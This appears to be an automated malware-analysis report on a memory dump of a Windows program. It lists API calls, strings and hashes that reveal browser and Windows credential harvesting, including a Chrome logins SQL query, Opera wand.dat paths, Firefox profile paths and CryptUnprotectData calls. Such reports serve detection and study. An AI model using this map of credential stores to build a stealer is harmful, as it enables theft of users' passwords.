Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
API String ID: 2238633743-2107673790
Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14

Uniqueness

Uniqueness Score: -1.00%

Function 00411196, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143processlibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111B6
memset.MSVCRT ref: 004111CB
Process32FirstW.KERNEL32(?,?), ref: 004111E7
OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
memset.MSVCRT ref: 00411253
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 004112C3
CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
free.MSVCRT(?), ref: 0041130D
Process32NextW.KERNEL32(?,0000022C), ref: 00411356
CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366

Strings

QueryFullProcessImageNameW, xrefs: 00411292
kernel32.dll, xrefs: 00411283

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 3536422406-1740548384
Opcode ID: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
Opcode Fuzzy Hash: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00408441, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00410790,?), ref: 00408457
FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00410790,?), ref: 00408475
wcslen.MSVCRT ref: 004084A5
wcslen.MSVCRT ref: 004084AD

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindwcslen$FirstNext
String ID:
API String ID: 2163959949-0
Opcode ID: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
Instruction ID: 6e3c8222864954d55df90d51b8e56744ea09e2897b7152e8bd6019cb1af30d80
Opcode Fuzzy Hash: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
Instruction Fuzzy Hash: E5118272515706AFD7149B24D984A9B73DCAF04725F604A3FF09AD31C0FF78A9448B29

Uniqueness

Uniqueness Score: -1.00%

Function 00411EF8, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceW.KERNELBASE(?,?,?), ref: 00411F05
SizeofResource.KERNEL32(?,00000000), ref: 00411F16
LoadResource.KERNEL32(?,00000000), ref: 00411F26
LockResource.KERNEL32(00000000), ref: 00411F31

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
Instruction ID: cfb809c5d0a350ba8a2f28afb84d758f7034e38599ab5d81eab5ea4ee58a4c6c
Opcode Fuzzy Hash: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
Instruction Fuzzy Hash: 140192367042156BCB295FA5DC4999BBFAEFF867917088036F909C7331DB30D941C688

Uniqueness

Uniqueness Score: -1.00%

Function 00415F87, Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 00415EAF: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
Part of subcall function 00415EAF: malloc.MSVCRT ref: 00415EE6
Part of subcall function 00415EAF: free.MSVCRT(?), ref: 00415EF6

Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED

GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416001
GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416029
free.MSVCRT(00000000,?,00000000,?,00000000), ref: 00416032

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
String ID:
API String ID: 1355100292-0
Opcode ID: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
Instruction ID: 7d405d749a0edc351a3ddf496a078fe72cac754ac47b8191c628d3d1323914f3
Opcode Fuzzy Hash: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
Instruction Fuzzy Hash: 45219276804108EEEB21EBA4C8849EF7BBCEF09304F1100ABE641D7141E778CEC597A5

Uniqueness

Uniqueness Score: -1.00%

Function 004161B0, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004161BB
GetSystemInfo.KERNELBASE(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystemmemset
String ID:
API String ID: 3558857096-0
Opcode ID: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
Instruction ID: 01e0680712ac90f889d23e176cd2934d89dbbab4f1fad96818c53916f6f4ffc6
Opcode Fuzzy Hash: b2614796881ddab84da0c6407dc57915020354a4b010b0c78962ddc3b3495293
Instruction Fuzzy Hash: D6E02230A0062067E3217732BE07FCF22848F02348F00403BFA00DA366F6AC881506ED

Uniqueness

Uniqueness Score: -1.00%

Function 00410168, Relevance: 56.4, APIs: 23, Strings: 9, Instructions: 441COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004101DA
wcsrchr.MSVCRT ref: 004101F2
memset.MSVCRT ref: 004102D9
ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,00000000,00000104), ref: 00410326

Part of subcall function 00409A34: _wcslwr.MSVCRT ref: 00409AFC
Part of subcall function 00409A34: wcslen.MSVCRT ref: 00409B11

Part of subcall function 00408619: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 00408652
Part of subcall function 00408619: wcslen.MSVCRT ref: 00408678
Part of subcall function 00408619: wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
Part of subcall function 00408619: memset.MSVCRT ref: 00408725
Part of subcall function 00408619: memcpy.MSVCRT ref: 00408746

Part of subcall function 00409EB8: LoadLibraryW.KERNELBASE(pstorec.dll,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 00409EC9
Part of subcall function 00409EB8: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00409EDC

Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F309
Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F31E
Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F333
Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F348
Part of subcall function 0040F2E6: memset.MSVCRT ref: 0040F35D
Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F383
Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F394
Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3CC
Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F3DA
Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F413
Part of subcall function 0040F2E6: wcslen.MSVCRT ref: 0040F421

memset.MSVCRT ref: 004103AA
memset.MSVCRT ref: 004103C6
memset.MSVCRT ref: 004103E2
memset.MSVCRT ref: 004104F9

Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E17
Part of subcall function 00406DD9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E69
Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E81
Part of subcall function 00406DD9: memset.MSVCRT ref: 00406E99
Part of subcall function 00406DD9: memset.MSVCRT ref: 00406EB1
Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EBC
Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406ECA
Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406EF9
Part of subcall function 00406DD9: wcslen.MSVCRT ref: 00406F07

wcslen.MSVCRT ref: 00410437
wcslen.MSVCRT ref: 00410446
wcslen.MSVCRT ref: 0041048B
wcslen.MSVCRT ref: 0041049A
memset.MSVCRT ref: 00410562
memset.MSVCRT ref: 0041057A
wcslen.MSVCRT ref: 00410593
wcslen.MSVCRT ref: 004105A1
wcslen.MSVCRT ref: 004105FC
wcslen.MSVCRT ref: 0041060A
memset.MSVCRT ref: 0041068A
wcslen.MSVCRT ref: 00410699
wcslen.MSVCRT ref: 00410720
wcslen.MSVCRT ref: 0041072E
wcslen.MSVCRT ref: 004106A7

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083BC
Part of subcall function 0040839D: wcscmp.MSVCRT ref: 004083CD

Strings

Google\Chrome\User Data, xrefs: 00410432, 0041045D
Opera\Opera\wand.dat, xrefs: 0041059A, 004105B8
wand.dat, xrefs: 00410727, 00410745
%programfiles%\Sea Monkey, xrefs: 00410321
Opera, xrefs: 004106A0, 004106BE
Google\Chrome SxS\User Data, xrefs: 00410486, 004104B1
Opera\Opera7\profile\wand.dat, xrefs: 00410603, 00410621
Path, xrefs: 004102E1
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe, xrefs: 004102E6

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$memset$wcscmp$AddressByteCharCredEnumerateEnvironmentExpandLibraryLoadMultiProcStringsWide_wcslwrmemcpywcscatwcscpywcsncmpwcsrchr
String ID: %programfiles%\Sea Monkey$Google\Chrome SxS\User Data$Google\Chrome\User Data$Opera$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$wand.dat
API String ID: 3717286792-109336846
Opcode ID: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
Instruction ID: 5236af18994b30efd903e1d9b734594bd5ee8d83944705dbeea0fe3cf72f0f99
Opcode Fuzzy Hash: 950feec3eb3c7ddcc0b68e018bc609b8eaa114617dc979202627b30a43ba34ef
Instruction Fuzzy Hash: A0F17771901218ABDB20EB51DD85ADEB378AF04714F5444ABF508A7181E7B8AFC4CF9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2F1, Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00403926: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040E305,00000000), ref: 00403945
Part of subcall function 00403926: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403957
Part of subcall function 00403926: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040E305,00000000), ref: 0040396B
Part of subcall function 00403926: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403996

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002), ref: 0040E319
GetModuleHandleW.KERNEL32(00000000,00411F7E,00000000,?,00000002), ref: 0040E332
EnumResourceTypesW.KERNEL32 ref: 0040E339
??3@YAXPAX@Z.MSVCRT ref: 0040E4CB
DeleteObject.GDI32(?), ref: 0040E4E1

Strings

, xrefs: 0040E34D
/savelangfile, xrefs: 0040E385
/deleteregkey, xrefs: 0040E3B3

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
String ID: $/deleteregkey$/savelangfile
API String ID: 3591293073-28296030
Opcode ID: 04717ecad4c52e76b3f79b80568957338dee78a451c8cd20a0ad402c75147398
Instruction ID: 121834c48f7c844bba9a1922674ad86b62a86fe916e360ab8a1a69ef7a5829fa
Opcode Fuzzy Hash: 04717ecad4c52e76b3f79b80568957338dee78a451c8cd20a0ad402c75147398
Instruction Fuzzy Hash: 5451B171408345ABD720AFA2DD4895FB7A8FF84709F000D3EF640A3191DB79D9158B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00408D9D, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28

Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2

free.MSVCRT(00000000), ref: 00408F8C

Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A

memset.MSVCRT ref: 00408E72

Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E

wcschr.MSVCRT ref: 00408EAA
memcpy.MSVCRT ref: 00408EDE
memcpy.MSVCRT ref: 00408EF9
memcpy.MSVCRT ref: 00408F14
memcpy.MSVCRT ref: 00408F2F

Strings

CreationTime, xrefs: 00408E1B
, xrefs: 00408DCF
AccessCount, xrefs: 00408E0E
ExpiryTime, xrefs: 00408E28
Url, xrefs: 00408E4F
EntryID, xrefs: 00408E5C
ModifiedTime, xrefs: 00408E42
AccessedTime, xrefs: 00408E35

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
API String ID: 3849927982-2252543386
Opcode ID: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
Instruction ID: 190f3b00b4426260eb01f26a53b79380eacfea7d83453a492e965ac02b193b52
Opcode Fuzzy Hash: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
Instruction Fuzzy Hash: 64510C72E00309AAEF10EFA5DD45A9EB7B9AF54314F14403FA544F7281EA78AA048F58

Uniqueness

Uniqueness Score: -1.00%

Function 00408B10, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00408836: memset.MSVCRT ref: 0040885E
Part of subcall function 00408836: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
Part of subcall function 00408836: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
Part of subcall function 00408836: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
Part of subcall function 00408836: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA

Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4

OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408BB1
GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6

Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506

Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F

CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
WriteFile.KERNELBASE(?,00000000,00000104,004091EB,00000000), ref: 00408C20
UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
FindCloseChangeNotification.KERNELBASE(?), ref: 00408C30
CloseHandle.KERNEL32(?), ref: 00408C35
CloseHandle.KERNEL32(00000000), ref: 00408C3A
CloseHandle.KERNEL32(00000000), ref: 00408C3F

Strings

Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 00408B16
bhv, xrefs: 00408BCF

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWritememset
String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
API String ID: 3663438264-4002013007
Opcode ID: 92f9f1b067ef90b6ccee0d8b67f312e4d5537bffff8df701e651ec9a81ff62ca
Instruction ID: 68c5544b499915da94545e51db83da674be7fd43246ed759ba52d344f26358cd
Opcode Fuzzy Hash: 92f9f1b067ef90b6ccee0d8b67f312e4d5537bffff8df701e651ec9a81ff62ca
Instruction Fuzzy Hash: CD412775901218BBDF11AF95CD899DFBFB9EF09751F10802AF608A6250DB349A40CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00402846, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 239fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040286E
CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402882
CopyFileW.KERNEL32(?,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028A3
FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028AE
memset.MSVCRT ref: 004028C7
DeleteFileW.KERNEL32(?,?,?,?,?,00000003,00000000,00000000), ref: 00402B1A

Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506

memset.MSVCRT ref: 0040293C

Part of subcall function 004027D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040280F
Part of subcall function 004027D7: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040283C

Part of subcall function 00407DF5: MultiByteToWideChar.KERNEL32(00000000,00000000,004029BE,000000FF,?,?,004029BE,?,?,000003FF), ref: 00407E07

Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897

memset.MSVCRT ref: 00402A95
memcpy.MSVCRT ref: 00402AA8
LocalFree.KERNEL32(00000000,?,?,000000FF,?,?,?,00000000,00000000,00000003), ref: 00402AD2

Strings

SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402908
chp, xrefs: 0040288D

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$Timememset$FreeLibraryLocalTemp$AddressByteChangeCharCloseCopyCreateDeleteDirectoryFindLoadMultiNameNotificationPathProcSystemWideWindowsmemcpy
String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
API String ID: 3603309061-1844170479
Opcode ID: d0caedd4ff45bc23c3f78f8d9d05a4faab82fa60d4f04c7d7ee099d959827c57
Instruction ID: e637edadd966e00c71b87c8ff6cc297e5f4b8f19ec80fc414d035a4907c068e8
Opcode Fuzzy Hash: d0caedd4ff45bc23c3f78f8d9d05a4faab82fa60d4f04c7d7ee099d959827c57
Instruction Fuzzy Hash: 37815172D001186BDB11EBA59D46BEEB7BCAF04304F5404BAF509F7281EB786F448B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0D5, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F0F8
memset.MSVCRT ref: 0040F10D
memset.MSVCRT ref: 0040F122
memset.MSVCRT ref: 0040F137
memset.MSVCRT ref: 0040F14C

Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA

Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E

wcslen.MSVCRT ref: 0040F172
wcslen.MSVCRT ref: 0040F183
wcslen.MSVCRT ref: 0040F1BB
wcslen.MSVCRT ref: 0040F1C9
wcslen.MSVCRT ref: 0040F202
wcslen.MSVCRT ref: 0040F210
memset.MSVCRT ref: 0040F296

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Strings

Mozilla\SeaMonkey\Profiles, xrefs: 0040F16D, 0040F19A, 0040F1B6, 0040F1E1
Mozilla\SeaMonkey, xrefs: 0040F1FD, 0040F228

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
API String ID: 2775653040-2068335096
Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2E6, Relevance: 21.2, APIs: 12, Strings: 2, Instructions: 159COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F309
memset.MSVCRT ref: 0040F31E
memset.MSVCRT ref: 0040F333
memset.MSVCRT ref: 0040F348
memset.MSVCRT ref: 0040F35D

Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA

Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E

wcslen.MSVCRT ref: 0040F383
wcslen.MSVCRT ref: 0040F394
wcslen.MSVCRT ref: 0040F3CC
wcslen.MSVCRT ref: 0040F3DA
wcslen.MSVCRT ref: 0040F413
wcslen.MSVCRT ref: 0040F421
memset.MSVCRT ref: 0040F4A7

Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0

Strings

Mozilla\Firefox\Profiles, xrefs: 0040F37E, 0040F3AB, 0040F3C7, 0040F3F2
Mozilla\Firefox, xrefs: 0040F40E, 0040F439

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
API String ID: 2775653040-3369679110
Opcode ID: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
Instruction ID: 627aa7309af3ce9e50a65207db29ad7cec2a96110015b88e099c10597549be0d
Opcode Fuzzy Hash: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
Instruction Fuzzy Hash: B15174729052196ADB20EB51CD85ECF73BC9F54304F5004FBF508F2081EBB96B888B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041139E, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED

Strings

psapi.dll, xrefs: 004113A4
GetModuleBaseNameW, xrefs: 004113B5
EnumProcesses, xrefs: 004113D7
GetModuleInformation, xrefs: 004113E3
GetModuleFileNameExW, xrefs: 004113CB
EnumProcessModules, xrefs: 004113BF

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2238633743-70141382
Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
Instruction ID: b0fa25657284a8e9196716ee499a251a0e3e908d4b843c37df8f242eb1d66817
Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
Instruction Fuzzy Hash: A3F03478988704AEEB30AF75DC08E07BEF0EFA8B11721892EE0C593650D7799441EF58

Uniqueness

Uniqueness Score: -1.00%

Function 00408619, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 004037C3: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
Part of subcall function 004037C3: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819

CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 00408652
wcslen.MSVCRT ref: 00408678
wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
memset.MSVCRT ref: 00408725
memcpy.MSVCRT ref: 00408746
_wcsnicmp.MSVCRT ref: 0040878B
wcschr.MSVCRT ref: 004087B3
LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 004087D7

Strings

Microsoft_WinInet, xrefs: 0040866A
Microsoft_WinInet_, xrefs: 00408785
J, xrefs: 004086F6

Memory Dump Source

Source File: 0000000A.00000002.331769902.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
String ID: J$Microsoft_WinInet$Microsoft_WinInet_
API String ID: 1313344744-1864008983
Opcode ID: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
Instruction ID: ae9214853af189039b11f9ecdcfbf9e5a6a1e8940f9aa775dff38fc8017bd4cb
Opcode Fuzzy Hash: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
